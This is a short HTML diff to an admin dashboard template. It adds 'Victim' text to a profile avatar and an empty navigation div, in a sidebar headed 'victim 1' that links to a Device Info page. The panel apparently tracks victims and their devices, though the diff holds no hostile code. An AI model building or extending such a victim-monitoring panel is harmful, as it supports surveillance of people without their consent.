--- a/admin/templates/overview.html
+++ b/admin/templates/overview.html
@@ -12,11 +12,11 @@
         <div class="sidebar">
             <div class="user-profile">
                 <div class="avatar">
-                    <div class="avatar-icon"></div>
+                    <div class="avatar-icon">Victim</div>
                 </div>
                 <h2>victim 1</h2>
             </div>
-            
+            <div class="nav-menu"></div>
             <nav class="sidebar-nav">
                 <a class="nav-item active" href="/templates/overview.html">Overview</a>
                 <a class="nav-item" href="/templates/device.html">Device Info</a>
